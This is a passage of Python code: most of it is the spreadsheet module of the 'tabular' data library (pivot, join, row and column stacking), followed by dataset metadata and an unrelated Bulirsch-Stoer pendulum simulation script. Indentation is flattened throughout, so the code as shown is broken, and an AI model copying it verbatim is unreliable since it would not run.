Dictionary mapping column names in `X` other than `a` or
`b` to appropriate null values for their types.
If `None`, then the null values defined by the `nullvalue`
function are used, see
:func:`tabular.spreadsheet.nullvalue`.
**prefix** : string, optional
Prefix to add to `coloring` keys corresponding to
cross-grouped "trivial columns relative to `b`". Default
value is an underscore, '_'.
**Returns**
**ptable** : numpy ndarray with structured dtype
The resulting pivot table.
**coloring** : dictionary
Dictionary whose keys are strings and corresponding values
are lists of column names (e.g. strings).
There are two groups of keys:
* So-called "nontrivial columns relative to `b`" in `X`.
These correspond to columns in::
set(`X.dtype.names`) - set([a, b])
* Cross-grouped "trivial columns relative to `b`". The
`prefix` is used to distinguish these.
            The `coloring` parameter is used by the tabarray pivot
method, :func:`tabular.tab.tabarray.pivot`.
See :func:`tabular.tab.tabarray.__new__` for more
information about coloring.
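    **Example**
        A minimal usage sketch; the column names and data below are invented
        purely for illustration::
            import numpy as np
            import tabular.spreadsheet as spreadsheet
            # one row per (A, B) pair, forming a complete 2 x 2 grid
            X = np.rec.fromrecords([('x', 'u', 1), ('x', 'v', 2),
                                    ('y', 'u', 3), ('y', 'v', 4)],
                                   names=['A', 'B', 'C'])
            # rows indexed by 'A', one column of 'C' values per value of 'B',
            # named 'u_C' and 'v_C'
            [P, coloring] = spreadsheet.pivot(X, 'A', 'B')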
'''
othernames = [o for o in X.dtype.names if o not in [a,b]]
for c in [a,b]:
assert c in X.dtype.names, 'Column ' + c + ' not found.'
[D,s] = fast.recarrayuniqify(X[[a,b]])
unique_ab = X[[a,b]][s[D.nonzero()[0]]]
assert len(X) == len(unique_ab) , \
('Pairs of values in columns', a, 'and', b, 'must be unique.')
[D,s] = fast.arrayuniqify(X[a])
unique_a = X[a][s[D.nonzero()[0]]]
[D,s] = fast.arrayuniqify(X[b])
unique_b = X[b][s[D.nonzero()[0]]]
Da = len(unique_a)
Db = len(unique_b)
if len(X) != Da * Db:
if list(X.dtype.names).index(a) < list(X.dtype.names).index(b):
n1 = a ; f1 = unique_a; n2 = b ; f2 = unique_b
else:
n1 = b ; f1 = unique_b; n2 = a ; f2 = unique_a
dtype = np.dtype([(n1,f1.dtype.descr[0][1]),(n2,f2.dtype.descr[0][1])])
allvalues = utils.fromarrays([np.repeat(f1,
len(f2)),
np.tile(f2,len(f1))],
np.ndarray,
dtype=dtype)
missingvalues = allvalues[np.invert(fast.recarrayisin(allvalues,
X[[a,b]]))]
if NullVals == None:
NullVals = {}
if not isinstance(NullVals,dict):
if hasattr(NullVals,'__call__'):
NullVals = dict([(o,NullVals(o)) for o in othernames])
else:
NullVals = dict([(o,NullVals) for o in othernames])
nullvals = utils.fromrecords([[NullVals[o] if o in NullVals.keys()
else utils.DEFAULT_NULLVALUE(X[o][0]) for o in
othernames]], type=np.ndarray, names=othernames)
nullarray = nullvals.repeat(len(missingvalues))
Y = colstack([missingvalues, nullarray])
Y = Y.astype(np.dtype([(o,
X.dtype[o].descr[0][1]) for o in Y.dtype.names]))
X = rowstack([X, Y])
X.sort(order = [a,b])
Bvals = X[b][:Db]
bnames = [str(bv).replace(' ','') for bv in Bvals]
assert (len(set(othernames).intersection(bnames)) == 0 and
a not in bnames), ('Processed values of column', b,
             'mustn\'t intersect with other column names.')
acol = X[a][::Db]
Cols = [acol]
names = [a]
Trivials = []
NonTrivials = []
for c in othernames:
Z = X[c].reshape((Da,Db))
if all([len(set(Z[:,i])) == 1 for i in range(Z.shape[1])]):
Trivials.append(c)
else:
NonTrivials.append(c)
Cols += [Z[:,i] for i in range(Z.shape[1])]
names += [bn + '_' + c for bn in bnames]
if order is not None:
ordering = [names.index(ord) for ord in order]
Cols = [Cols[i] for i in ordering]
names = [names[i] for i in ordering]
dtype = np.dtype([(n,c.dtype.descr[0][1]) for (n,c) in zip(names,Cols)])
D = utils.fromarrays(Cols,type=np.ndarray,dtype=dtype)
coloring = {}
if Keep != None:
Trivials = set(Trivials).intersection(Keep)
for c in Trivials:
X.sort(order=[c])
cvals = np.array(utils.uniqify(X[c]))
[AA,BB] = fast.equalspairs(cvals,X[c])
for (i,cc) in enumerate(cvals):
blist = [str(bv).replace(' ', '') for bv in Bvals if bv in
X[b][AA[i]:BB[i]]]
coloring[str(cc)] = [a] + [bn + '_' + d for bn in blist for d
in NonTrivials]
for d in NonTrivials:
coloring[str(cc) + '_' + d] = [a] + blist
for c in NonTrivials:
coloring[c] = [a] + [bn + '_' + c for bn in bnames]
for bn in bnames:
coloring[prefix + bn] = [a] + [bn + '_' + c for c in NonTrivials]
return [D, coloring]
def addrecords(X, new):
"""
    Append one or more records to the end of a numpy recarray or ndarray.
Can take a single record, void or tuple, or a list of records, voids or
tuples.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.addrecords`.
**Parameters**
**X** : numpy ndarray with structured dtype or recarray
The array to add records to.
**new** : record, void or tuple, or list of them
Record(s) to add to `X`.
**Returns**
**out** : numpy ndarray with structured dtype
New numpy array made up of `X` plus the new records.
**See also:** :func:`tabular.spreadsheet.rowstack`
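    **Example**
        A minimal usage sketch; the data below are invented purely for
        illustration::
            import numpy as np
            import tabular.spreadsheet as spreadsheet
            X = np.rec.fromrecords([('x', 1), ('y', 2)], names=['A', 'B'])
            # append one record; the tuple must match X's dtype
            Y = spreadsheet.addrecords(X, ('z', 3))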
"""
if isinstance(new, np.record) or isinstance(new, np.void) or \
isinstance(new, tuple):
new = [new]
return np.append(X, utils.fromrecords(new, type=np.ndarray,
dtype=X.dtype), axis=0)
def addcols(X, cols, names=None):
"""
Add one or more columns to a numpy ndarray.
Technical dependency of :func:`tabular.spreadsheet.aggregate_in`.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.addcols`.
**Parameters**
**X** : numpy ndarray with structured dtype or recarray
The recarray to add columns to.
**cols** : numpy ndarray, or list of arrays of columns
Column(s) to add.
**names**: list of strings, optional
Names of the new columns. Only applicable when `cols` is a
list of arrays.
**Returns**
**out** : numpy ndarray with structured dtype
New numpy array made up of `X` plus the new columns.
**See also:** :func:`tabular.spreadsheet.colstack`
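    **Example**
        A minimal usage sketch; the data below are invented purely for
        illustration::
            import numpy as np
            import tabular.spreadsheet as spreadsheet
            X = np.rec.fromrecords([('x', 1), ('y', 2)], names=['A', 'B'])
            # add a single new column 'C' of the same length as X
            Y = spreadsheet.addcols(X, [0.1, 0.2], names=['C'])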
"""
if isinstance(names,str):
names = [n.strip() for n in names.split(',')]
if isinstance(cols, list):
if any([isinstance(x,np.ndarray) or isinstance(x,list) or \
isinstance(x,tuple) for x in cols]):
assert all([len(x) == len(X) for x in cols]), \
'Trying to add columns of wrong length.'
assert names != None and len(cols) == len(names), \
'Number of columns to add must equal number of new names.'
cols = utils.fromarrays(cols,type=np.ndarray,names = names)
else:
assert len(cols) == len(X), 'Trying to add column of wrong length.'
cols = utils.fromarrays([cols], type=np.ndarray,names=names)
else:
assert isinstance(cols, np.ndarray)
if cols.dtype.names == None:
cols = utils.fromarrays([cols],type=np.ndarray, names=names)
Replacements = [a for a in cols.dtype.names if a in X.dtype.names]
if len(Replacements) > 0:
print('Replacing columns',
[a for a in cols.dtype.names if a in X.dtype.names])
return utils.fromarrays(
[X[a] if a not in cols.dtype.names else cols[a] for a in X.dtype.names] +
[cols[a] for a in cols.dtype.names if a not in X.dtype.names],
type=np.ndarray,
names=list(X.dtype.names) + [a for a in cols.dtype.names
if a not in X.dtype.names])
def deletecols(X, cols):
"""
Delete columns from a numpy ndarry or recarray.
Can take a string giving a column name or comma-separated list of column
names, or a list of string column names.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.deletecols`.
**Parameters**
**X** : numpy recarray or ndarray with structured dtype
The numpy array from which to delete columns.
**cols** : string or list of strings
Name or list of names of columns in `X`. This can be
a string giving a column name or comma-separated list of
column names, or a list of string column names.
**Returns**
**out** : numpy ndarray with structured dtype
New numpy ndarray with structured dtype
given by `X`, excluding the columns named in `cols`.
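    **Example**
        A minimal usage sketch; the data below are invented purely for
        illustration::
            import numpy as np
            import tabular.spreadsheet as spreadsheet
            X = np.rec.fromrecords([('x', 1, 2.0), ('y', 2, 3.0)],
                                   names=['A', 'B', 'C'])
            # drop columns 'B' and 'C'; a comma-separated string or a list
            # of names both work
            Y = spreadsheet.deletecols(X, 'B,C')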
"""
if isinstance(cols, str):
cols = cols.split(',')
retain = [n for n in X.dtype.names if n not in cols]
if len(retain) > 0:
return X[retain]
else:
return None
def renamecol(X, old, new):
"""
Rename column of a numpy ndarray with structured dtype, in-place.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.renamecol`.
**Parameters**
**X** : numpy ndarray with structured dtype
The numpy array for which a column is to be renamed.
**old** : string
Old column name, e.g. a name in `X.dtype.names`.
**new** : string
New column name to replace `old`.
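    **Example**
        A minimal usage sketch; the data below are invented purely for
        illustration::
            import numpy as np
            import tabular.spreadsheet as spreadsheet
            X = np.rec.fromrecords([('x', 1), ('y', 2)], names=['A', 'B'])
            # rename column 'B' to 'count', in-place
            spreadsheet.renamecol(X, 'B', 'count')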
"""
NewNames = tuple([n if n != old else new for n in X.dtype.names])
X.dtype.names = NewNames
def replace(X, old, new, strict=True, cols=None, rows=None):
"""
Replace value `old` with `new` everywhere it appears in-place.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.replace`.
**Parameters**
**X** : numpy ndarray with structured dtype
Numpy array for which in-place replacement of `old` with
`new` is to be done.
**old** : string
**new** : string
**strict** : boolean, optional
* If `strict` = `True`, replace only exact occurences of `old`.
* If `strict` = `False`, assume `old` and `new` are strings and
replace all occurences of substrings (e.g. like
:func:`str.replace`)
**cols** : list of strings, optional
Names of columns to make replacements in; if `None`, make
replacements everywhere.
**rows** : list of booleans or integers, optional
Rows to make replacements in; if `None`, make replacements
everywhere.
Note: This function does in-place replacements. Thus there are issues
handling data types here when replacement dtype is larger than original
dtype. This can be resolved later by making a new array when necessary ...
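    **Example**
        A minimal usage sketch; the data below are invented purely for
        illustration::
            import numpy as np
            import tabular.spreadsheet as spreadsheet
            X = np.rec.fromrecords([('cat', 1), ('dog', 2)], names=['A', 'B'])
            # replace exact occurrences of 'cat' with 'cow' in column 'A',
            # in-place
            spreadsheet.replace(X, 'cat', 'cow', cols=['A'])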
"""
if cols == None:
cols = X.dtype.names
elif isinstance(cols, str):
cols = cols.split(',')
if rows == None:
rows = np.ones((len(X),), bool)
if strict:
new = np.array(new)
for a in cols:
if X.dtype[a] < new.dtype:
print('WARNING: dtype of column', a,
'is inferior to dtype of ', new,
'which may cause problems.')
try:
X[a][(X[a] == old)[rows]] = new
except:
print('Replacement not made on column', a, '.')
else:
for a in cols:
QuickRep = True
try:
colstr = ''.join(X[a][rows])
except TypeError:
print('Not replacing in column', a, 'due to type mismatch.')
else:
avoid = [ord(o) for o in utils.uniqify(old + new + colstr)]
ok = set(range(256)).difference(avoid)
if len(ok) > 0:
sep = chr(list(ok)[0])
else:
ok = set(range(65536)).difference(avoid)
if len(ok) > 0:
sep = unichr(list(ok)[0])
else:
print('All unicode characters represented in column',
                          a, ', can\'t replace quickly.')
QuickRep = False
if QuickRep:
newrows = np.array(sep.join(X[a][rows])
.replace(old, new).split(sep))
else:
newrows = np.array([aa.replace(old,new) for aa in
X[a][rows]])
X[a][rows] = np.cast[X.dtype[a]](newrows)
if newrows.dtype > X.dtype[a]:
print('WARNING: dtype of column', a, 'is inferior to the '
'dtype of its replacement which may cause problems '
'(ends of strings might get chopped off).')
def rowstack(seq, mode='nulls', nullvals=None):
'''
    Vertically stack a sequence of numpy ndarrays with structured dtype.
    Analog of numpy.vstack for arrays with structured dtype.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.rowstack` which uses
:func:`tabular.tabarray.tab_rowstack`.
**Parameters**
**seq** : sequence of numpy recarrays
List, tuple, etc. of numpy recarrays to stack vertically.
**mode** : string in ['nulls', 'commons', 'abort']
Denotes how to proceed if the recarrays have different
dtypes, e.g. different sets of named columns.
* if `mode` == ``nulls``, the resulting set of columns is
determined by the union of the dtypes of all recarrays
to be stacked, and missing data is filled with null
values as defined by
:func:`tabular.spreadsheet.nullvalue`; this is the
default mode.
* elif `mode` == ``commons``, the resulting set of
columns is determined by the intersection of the dtypes
of all recarrays to be stacked, e.g. common columns.
* elif `mode` == ``abort``, raise an error when the
recarrays to stack have different dtypes.
**Returns**
**out** : numpy ndarray with structured dtype
Result of vertically stacking the arrays in `seq`.
**See also:** `numpy.vstack
<http://docs.scipy.org/doc/numpy/reference/generated/numpy.vstack.html>`_.
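    **Example**
        A minimal usage sketch; the data below are invented purely for
        illustration::
            import numpy as np
            import tabular.spreadsheet as spreadsheet
            X = np.rec.fromrecords([('x', 1)], names=['A', 'B'])
            Y = np.rec.fromrecords([('y', 2.0)], names=['A', 'C'])
            # columns are the union 'A', 'B', 'C'; entries missing from
            # either input are filled with null values
            Z = spreadsheet.rowstack([X, Y], mode='nulls')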
'''
if nullvals == None:
nullvals = utils.DEFAULT_NULLVALUEFORMAT
#newseq = [ss for ss in seq if len(ss) > 0]
if len(seq) > 1:
assert mode in ['commons','nulls','abort'], \
('"mode" argument must either by "commons", "abort", or "nulls".')
if mode == 'abort':
if not all([set(l.dtype.names) == set(seq[0].dtype.names)
for l in seq]):
raise ValueError('Some column names are different.')
else:
mode = 'commons'
if mode == 'nulls':
names = utils.uniqify(utils.listunion([list(s.dtype.names)
for s in seq if s.dtype.names != None]))
formats = [max([s.dtype[att] for s in seq if s.dtype.names != None
and att in s.dtype.names]).str for att in names]
dtype = np.dtype(zip(names,formats))
return utils.fromarrays([utils.listunion([s[att].tolist()
if (s.dtype.names != None and att in s.dtype.names)
else [nullvals(format)] * len(s) for s in seq])
for (att, format) in zip(names, formats)], type=np.ndarray,
dtype=dtype)
elif mode == 'commons':
names = [x for x in seq[0].dtype.names
if all([x in l.dtype.names for l in seq[1:]])]
formats = [max([a.dtype[att] for a in seq]).str for att in names]
return utils.fromrecords(utils.listunion(
[ar.tolist() for ar in seq]), type=np.ndarray,
names=names, formats=formats)
else:
return seq[0]
def colstack(seq, mode='abort',returnnaming=False):
"""
    Horizontally stack a sequence of numpy ndarrays with structured dtypes.
Analog of numpy.hstack for recarrays.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.colstack` which uses
:func:`tabular.tabarray.tab_colstack`.
**Parameters**
**seq** : sequence of numpy ndarray with structured dtype
List, tuple, etc. of numpy recarrays to stack vertically.
**mode** : string in ['first','drop','abort','rename']
Denotes how to proceed if when multiple recarrays share the
same column name:
* if `mode` == ``first``, take the column from the first
recarray in `seq` containing the shared column name.
* elif `mode` == ``abort``, raise an error when the
recarrays to stack share column names; this is the
default mode.
* elif `mode` == ``drop``, drop any column that shares
its name with any other column among the sequence of
recarrays.
* elif `mode` == ``rename``, for any set of all columns
sharing the same name, rename all columns by appending
an underscore, '_', followed by an integer, starting
with '0' and incrementing by 1 for each subsequent
column.
**Returns**
**out** : numpy ndarray with structured dtype
Result of horizontally stacking the arrays in `seq`.
**See also:** `numpy.hstack
<http://docs.scipy.org/doc/numpy/reference/generated/numpy.hstack.html>`_.
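    **Example**
        A minimal usage sketch; the data below are invented purely for
        illustration::
            import numpy as np
            import tabular.spreadsheet as spreadsheet
            X = np.rec.fromrecords([('x', 1), ('y', 2)], names=['A', 'B'])
            Y = np.rec.fromrecords([(0.1,), (0.2,)], names=['C'])
            # the arrays must have equal length; the column sets here are
            # disjoint, so the default mode='abort' is fine
            Z = spreadsheet.colstack([X, Y])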
"""
assert mode in ['first','drop','abort','rename'], \
'mode argument must take on value "first","drop", "rename", or "abort".'
AllNames = utils.uniqify(utils.listunion(
[list(l.dtype.names) for l in seq]))
NameList = [(x, [i for i in range(len(seq)) if x in seq[i].dtype.names])
for x in AllNames]
Commons = [x[0] for x in NameList if len(x[1]) > 1]
if len(Commons) > 0 or mode == 'first':
if mode == 'abort':
raise ValueError('There are common column names with differing ' +
'values in the columns')
elif mode == 'drop':
Names = [(L[0], x,x) for (x, L) in NameList if x not in Commons]
elif mode == 'rename':
NameDict = dict(NameList)
Names = utils.listunion([[(i,n,n) if len(NameDict[n]) == 1 else \
(i,n,n + '_' + str(i)) for n in s.dtype.names] \
for (i,s) in enumerate(seq)])
else:
Names = [(L[0], x,x) for (x, L) in NameList]
if returnnaming:
return utils.fromarrays([seq[i][x] for (i, x,y) in Names],
type= np.ndarray,names=zip(*Names)[2]),Names
else:
return utils.fromarrays([seq[i][x] for (i, x,y) in Names],
type= np.ndarray,names=zip(*Names)[2])
def join(L, keycols=None, nullvals=None, renamer=None,
returnrenaming=False, Names=None):
"""
Combine two or more numpy ndarray with structured dtype on common key
column(s).
Merge a list (or dictionary) of numpy ndarray with structured dtype, given
by `L`, on key columns listed in `keycols`.
This function is actually a wrapper for
:func:`tabular.spreadsheet.strictjoin`.
The ``strictjoin`` function has a few restrictions, and this ``join``
function will try to ensure that they are satisfied:
* each element of `keycol` must be a valid column name in `X`
and each array in `L`, and all of the same data-type.
* for each column `col` in `keycols`, and each array `A` in `L`, the
values in `A[col]` must be unique, -- and same for `X[col]`.
(Actually this uniqueness doesn't have to hold for the first tabarray
in L, that is, L[0], but must for all the subsequent ones.)
* the *non*-key-column column names in each of the arrays must be
disjoint from each other -- or disjoint after a renaming (see below).
An error will be thrown if these conditions are not met.
If you don't provide a value of `keycols`, the algorithm will attempt to
infer which columns should be used by trying to find the largest set of
common column names that contain unique values in each array and have the
same data type. An error will be thrown if no such inference can be made.
*Renaming of overlapping columns*
If the non-keycol column names of the arrays overlap, ``join`` will
by default attempt to rename the columns by using a simple
convention:
* If `L` is a list, it will append the number in the list to the
key associated with the array.
* If `L` is a dictionary, the algorithm will append the string
representation of the key associated with an array to the
overlapping columns from that array.
You can override the default renaming scheme using the `renamer`
parameter.
*Nullvalues for keycolumn differences*
If there are regions of the keycolumns that are not overlapping
between merged arrays, `join` will fill in the relevant entries
with null values chosen by default:
* '0' for integer columns
* '0.0' for float columns
* the empty character ('') for string columns.
**Parameters**
**L** : list or dictionary
Numpy recarrays to merge. If `L` is a dictionary, the keys
name each numpy recarray, and the corresponding values are
the actual numpy recarrays.
**keycols** : list of strings
List of the names of the key columns along which to do the
merging.
**nullvals** : function, optional
A function that returns a null value for a numpy format
descriptor string, e.g. ``'<i4'`` or ``'|S5'``.
See the default function for further documentation:
:func:`tabular.spreadsheet.DEFAULT_NULLVALUEFORMAT`
**renamer** : function, optional
A function for renaming overlapping non-key column names
among the numpy recarrays to merge.
See the default function for further documentation:
:func:`tabular.spreadsheet.DEFAULT_RENAMER`
**returnrenaming** : Boolean, optional
Whether to return the result of the `renamer` function.
See the default function for further documentation:
:func:`tabular.spreadsheet.DEFAULT_RENAMER`
**Names**: list of strings:
            If `L` is a list, then names for elements of `L` can be
specified with `Names` (without losing the ordering as you
would if you did it with a dictionary).
`len(L)` must equal `len(Names)`
**Returns**
**result** : numpy ndarray with structured dtype
Result of the join, e.g. the result of merging the input
numpy arrays defined in `L` on the key columns listed in
`keycols`.
**renaming** : dictionary of dictionaries, optional
The result returned by the `renamer` function. Returned
only if `returnrenaming == True`.
See the default function for further documentation:
:func:`tabular.spreadsheet.DEFAULT_RENAMER`
**See Also:**
:func:`tabular.spreadsheet.strictjoin`
"""
if isinstance(L, dict):
Names = L.keys()
LL = L.values()
else:
if Names == None:
Names = range(len(L))
else:
assert len(Names) == len(L)
LL = L
if not keycols:
keycols = utils.listintersection([a.dtype.names for a in LL])
if len(keycols) == 0:
raise ValueError('No common column names found.')
keycols = [l for l in keycols if all([a.dtype[l] == LL[0].dtype[l]
for a in LL])]
if len(keycols) == 0:
raise ValueError('No suitable common keycolumns, '
'with identical datatypes found.')
keycols = [l for l in keycols if all([isunique(a[keycols])
for a in LL])]
if len(keycols) == 0:
raise ValueError('No suitable common keycolumns, '
'with unique value sets in all arrays to be '
'merged, were found.')
else:
            print('Inferring keycols to be: ' + repr(keycols))
elif isinstance(keycols,str):
keycols = [l.strip() for l in keycols.split(',')]
commons = set(Commons([l.dtype.names for l in LL])).difference(keycols)
renaming = {}
if len(commons) > 0:
        print('common attributes, forcing a renaming ...')
if renamer == None:
print('Using default renamer ...')
renamer = DEFAULT_RENAMER
renaming = renamer(L, Names=Names)
if not RenamingIsInCorrectFormat(renaming, L, Names=Names):
            print('Renaming from specified renamer is not in correct format, '
'using default renamer instead ...')
renaming = DEFAULT_RENAMER(L, Names = Names)
NewNames = [[l if l not in renaming[k].keys() else renaming[k][l]
for l in ll.dtype.names] for (k, ll) in zip(Names, LL)]
if set(Commons(NewNames)).difference(keycols):
raise ValueError('Renaming convention failed to produce '
'separated names.')
Result = strictjoin(L, keycols, nullvals, renaming, Names=Names)
if returnrenaming:
return [Result, renaming]
else:
if renaming:
print('There was a nontrivial renaming, to get it set '
'"returnrenaming = True" in keyword to join function.')
return Result
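# --- Editor's illustrative sketch (not part of the original module) --------
# Minimal example of joining two structured arrays on a shared, unique key
# column.  The column names and values here are made up for illustration and
# assume the surrounding tabular package is importable.
def _join_usage_example():
    x = np.rec.fromrecords([(1, 30.0), (2, 40.0)], names=['id', 'temp'])
    y = np.rec.fromrecords([(1, 'low'), (2, 'high')], names=['id', 'label'])
    # Merge on 'id'; the non-key columns ('temp', 'label') are disjoint, so
    # no renaming is needed.
    return join([x, y], keycols=['id'])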
def strictjoin(L, keycols, nullvals=None, renaming=None, Names=None):
"""
Combine two or more numpy ndarray with structured dtypes on common key
column(s).
Merge a list (or dictionary) of numpy arrays, given by `L`, on key
columns listed in `keycols`.
The ``strictjoin`` assumes the following restrictions:
    * each element of `keycols` must be a valid column name in each array
      in `L`, and of the same data-type across all of them.
    * for each column `col` in `keycols`, and each array `A` in `L`, the
      values in `A[col]` must be unique, e.g. no repeats of values.
      (Actually, the uniqueness criterion need not hold for the first
      tabarray in L, but must for all the subsequent ones.)
* the *non*-key-column column names in each of the arrays must be
disjoint from each other -- or disjoint after a renaming (see below).
An error will be thrown if these conditions are not met.
For a wrapper that attempts to meet these restrictions, see
:func:`tabular.spreadsheet.join`.
If you don't provide a value of `keycols`, the algorithm will attempt to
infer which columns should be used by trying to find the largest set of
common column names that contain unique values in each array and have the
same data type. An error will be thrown if no such inference can be made.
*Renaming of overlapping columns*
If the non-keycol column names of the arrays overlap, ``join`` will
by default attempt to rename the columns by using a simple
convention:
    * If `L` is a list, the algorithm will append the array's position
      (index) in the list to the overlapping columns from that array.
* If `L` is a dictionary, the algorithm will append the string
representation of the key associated with an array to the
overlapping columns from that array.
You can override the default renaming scheme using the `renamer`
parameter.
*Nullvalues for keycolumn differences*
If there are regions of the keycolumns that are not overlapping
between merged arrays, `join` will fill in the relevant entries
with null values chosen by default:
* '0' for integer columns
* '0.0' for float columns
* the empty character ('') for string columns.
**Parameters**
**L** : list or dictionary
Numpy recarrays to merge. If `L` is a dictionary, the keys
name each numpy recarray, and the corresponding values are
the actual numpy recarrays.
**keycols** : list of strings
List of the names of the key columns along which to do the
merging.
**nullvals** : function, optional
A function that returns a null value for a numpy format
descriptor string, e.g. ``'<i4'`` or ``'|S5'``.
See the default function for further documentation:
:func:`tabular.spreadsheet.DEFAULT_NULLVALUEFORMAT`
**renaming** : dictionary of dictionaries, optional
Dictionary mapping each input numpy recarray to a
dictionary mapping each original column name to its new
name following the convention above.
For example, the result returned by:
:func:`tabular.spreadsheet.DEFAULT_RENAMER`
**Returns**
**result** : numpy ndarray with structured dtype
Result of the join, e.g. the result of merging the input
numpy arrays defined in `L` on the key columns listed in
`keycols`.
**See Also:**
:func:`tabular.spreadsheet.join`
"""
if isinstance(L,dict):
Names = L.keys()
LL = L.values()
else:
if Names == None:
Names = range(len(L))
else:
assert len(Names) == len(L)
LL = L
if isinstance(keycols,str):
keycols = [l.strip() for l in keycols.split(',')]
assert all([set(keycols) <= set(l.dtype.names) for l in LL]), \
('keycols,', str(keycols),
', must be valid column names in all arrays being merged.')
assert all([isunique(l[keycols]) for l in LL[1:]]), \
('values in keycol columns,', str(keycols),
', must be unique in all arrays being merged.')
if renaming == None:
renaming = {}
assert RenamingIsInCorrectFormat(renaming, L, Names=Names), \
'renaming is not in proper format ... '
L = dict([(k,ll.copy()) for (k,ll) in zip(Names,LL)])
LL = L.values()
for i in Names:
l = L[i]
l.dtype = np.dtype(l.dtype.descr)
if i in renaming.keys():
for k in renaming[i].keys():
if k not in keycols:
renamecol(L[i], k, renaming[i][k])
l.sort(order = keycols)
commons = set(Commons([l.dtype.names for l in LL])).difference(keycols)
assert len(commons) == 0, ('The following (non-keycol) column names '
            'appear in more than one array being merged:', str(commons))
Result = colstack([(L[Names[0]][keycols])[0:0]] +
[deletecols(L[k][0:0], keycols) \
for k in Names if deletecols(L[k][0:0], keycols) != None])
PL = powerlist(Names)
ToGet = utils.listunion([[p for p in PL if len(p) == k]
for k in range(1, len(Names))]) + [PL[-1]]
for I in ToGet[::-1]:
Ref = L[I[0]][keycols]
for j in I[1:]:
if len(Ref) > 0:
Ref = Ref[fast.recarrayisin(Ref, L[j][keycols], weak=True)]
else:
break
if len(Ref) > 0:
D = [fast.recarrayisin(L[j][keycols], Ref, weak=True) for j in I]
Ref0 = L[I[0]][keycols][D[0]]
Reps0 = np.append(np.append([-1],
(Ref0[1:] != Ref0[:-1]).nonzero()[0]),[len(Ref0)-1])
Reps0 = Reps0[1:] - Reps0[:-1]
NewRows = colstack([Ref0] +
[deletecols(L[j][D[i]], keycols).repeat(Reps0) if i > 0 else
deletecols(L[j][D[i]], keycols) for (i, j) in enumerate(I)
if deletecols(L[j][D[i]], keycols) != None])
for (i,j) in enumerate(I):
L[j] = L[j][np.invert(D[i])]
Result = rowstack([Result, NewRows], mode='nulls',
nullvals=nullvals)
return Result
def RenamingIsInCorrectFormat(renaming, L, Names=None):
if isinstance(L, dict):
Names = L.keys()
LL = L.values()
else:
if Names == None:
Names = range(len(L))
else:
assert len(Names) == len(L)
LL = L
return isinstance(renaming, dict) and \
set(renaming.keys()) <= set(Names) and \
all([isinstance(renaming[k],dict) and
set(renaming[k].keys()) <=
set(LL[Names.index(k)].dtype.names) for k in renaming.keys()])
def DEFAULT_RENAMER(L, Names=None):
"""
Renames overlapping column names of numpy ndarrays with structured dtypes
Rename the columns by using a simple convention:
* If `L` is a list, it will append the number in the list to the key
associated with the array.
* If `L` is a dictionary, the algorithm will append the string
representation of the key associated with an array to the overlapping
columns from that array.
Default renamer function used by :func:`tabular.spreadsheet.join`
**Parameters**
**L** : list or dictionary
Numpy recarrays with columns to be renamed.
**Returns**
**D** : dictionary of dictionaries
Dictionary mapping each input numpy recarray to a
dictionary mapping each original column name to its new
name following the convention above.
"""
if isinstance(L,dict):
Names = L.keys()
LL = L.values()
else:
if Names == None:
Names = range(len(L))
else:
assert len(Names) == len(L)
LL = L
commons = Commons([l.dtype.names for l in LL])
D = {}
for (i,l) in zip(Names, LL):
d = {}
for c in commons:
if c in l.dtype.names:
d[c] = c + '_' + str(i)
if d:
D[i] = d
return D
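# Illustrative example (editor's addition): for a list of two arrays that
# both contain a column 'val', DEFAULT_RENAMER returns
#     {0: {'val': 'val_0'}, 1: {'val': 'val_1'}}
# i.e. only the overlapping columns are renamed, keyed by list position.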
def Commons(ListOfLists):
commons = []
for i in range(len(ListOfLists)):
for j in range(i+1, len(ListOfLists)):
commons.extend([l for l in ListOfLists[i] if l in ListOfLists[j]])
return commons
def powerlist(S):
if len(S) > 0:
Sp = powerlist(S[:-1])
return Sp + [x + [S[-1]] for x in Sp]
else:
return [[]]
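# Illustrative example (editor's addition): powerlist enumerates all
# sublists, e.g. powerlist(['a', 'b']) == [[], ['a'], ['b'], ['a', 'b']].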
def isunique(col):
[D,s] = fast.recarrayuniqify(col)
return len(D.nonzero()[0]) == len(col) | mit | -489,199,996,321,512,960 | 34.931533 | 92 | 0.546152 | false |
KiMiralles/Python-Learning | Computational Physics Newman/Book Resources/bulirsch.py | 1 | 1824 | from math import sin,pi
from numpy import empty,array,arange
from pylab import plot,show
g = 9.81
l = 0.1
theta0 = 179*pi/180
a = 0.0
b = 10.0
N = 100 # Number of "big steps"
H = (b-a)/N # Size of "big steps"
delta = 1e-8 # Required position accuracy per unit time
def f(r):
theta = r[0]
omega = r[1]
ftheta = omega
fomega = -(g/l)*sin(theta)
return array([ftheta,fomega],float)
tpoints = arange(a,b,H)
thetapoints = []
r = array([theta0,0.0],float)
# Do the "big steps" of size H
for t in tpoints:
thetapoints.append(r[0])
# Do one modified midpoint step to get things started
n = 1
r1 = r + 0.5*H*f(r)
r2 = r + H*f(r1)
# The array R1 stores the first row of the
# extrapolation table, which contains only the single
# modified midpoint estimate of the solution at the
# end of the interval
R1 = empty([1,2],float)
R1[0] = 0.5*(r1 + r2 + 0.5*H*f(r2))
# Now increase n until the required accuracy is reached
error = 2*H*delta
while error>H*delta:
n += 1
h = H/n
# Modified midpoint method
r1 = r + 0.5*h*f(r)
r2 = r + h*f(r1)
for i in range(n-1):
r1 += h*f(r2)
r2 += h*f(r1)
# Calculate extrapolation estimates. Arrays R1 and R2
# hold the two most recent lines of the table
R2 = R1
R1 = empty([n,2],float)
R1[0] = 0.5*(r1 + r2 + 0.5*h*f(r2))
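        # Editor's clarifying note: the loop below applies Richardson
        # extrapolation, R_{n,m+1} = R_{n,m} + (R_{n,m} - R_{n-1,m}) /
        # [(n/(n-1))**(2m) - 1]; `epsilon` is that correction term.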
for m in range(1,n):
epsilon = (R1[m-1]-R2[m-1])/((n/(n-1))**(2*m)-1)
R1[m] = R1[m-1] + epsilon
error = abs(epsilon[0])
# Set r equal to the most accurate estimate we have,
# before moving on to the next big step
r = R1[n-1]
# Plot the results
plot(tpoints,thetapoints)
plot(tpoints,thetapoints,"b.")
show()
| gpl-3.0 | 7,120,225,636,442,674,000 | 23.648649 | 62 | 0.565241 | false |
